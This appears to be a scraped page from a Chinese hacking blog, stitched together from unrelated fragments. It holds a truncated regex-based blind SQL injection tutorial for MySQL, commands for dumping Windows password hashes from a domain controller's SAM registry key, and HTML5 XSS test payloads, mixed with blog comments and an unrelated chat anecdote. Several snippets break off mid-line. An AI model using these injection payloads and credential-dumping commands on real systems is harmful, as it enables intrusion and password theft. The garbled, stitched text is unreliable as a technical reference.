你他妈太有才了·

之前的博文已经提到过基于时间差的注入攻击，其实利用正则表达式进行盲注将节省大量的时间：

-----------------------------------------MYSQL 5+-----------------------------------------

我们都已经知道，在MYSQL 5+中 information_schema库中存储了所有的 库名，表明以及字段名信息。故攻击方式如下：

1. 判断第一个表名的第一个字符是否是a-z中的字符,其中blind_sqli是假设已知的库名。

注：正则表达式中 ^[a-z] 表示字符串中开始字符是在 a-z范围内

index.php?id=1 an

突破10W流量，放个圈圈出去·

跟你学习了··

因为域控制器一般设置严格，用类似的远程执行工具在执行命令时，往往不会成功，会提示类似not write memory的错误这时，我们就要用到其它的方法来获取Hash了。

1.用psexec类似远程执行工具，直接抓远程hash 2.copy C:\WINDOWS\repair
3.regedit \\ip /e d:\aa.reg /S "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
 
4.用windows系统自带的,Gui 界面方式，远程操作注册表。
5.远程管理工具
DameWare Mini Remote Control

引入媒体类测试代码Example:

 
<video onerror=javascript:alert(1)><source>
 
<audio onerror=javascript:alert(1)><source>
 
表单点击测试代码Example:
 
<form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)

>X

鼠标事件测试代码Example:
 
Before HTML5:
 
 <input type=text value=‐‐>Injecting here onmouseover=alert(

http://ha.ckers.org/xss.html

Vulnerable To Blind SQL Injection  # By Jackh4xor @ W4ck1ng – http://www.jackh4xor.com/

http://www.hackerregiment.com/mysql-com-vulnerable-to-blind-sql-injection.html

The Mysql website offers database softw

“凤姐，今天你亲自上QQ啊？”

凤姐不语，面无表情，接着喝了一口水，继续面盯着显示器，过一会凤姐玩起来斗地主。我又说，

“凤

http://www.cnbeta.com/articles/117703.htm

TX爆的这个BUG还真滑稽..笑而不语！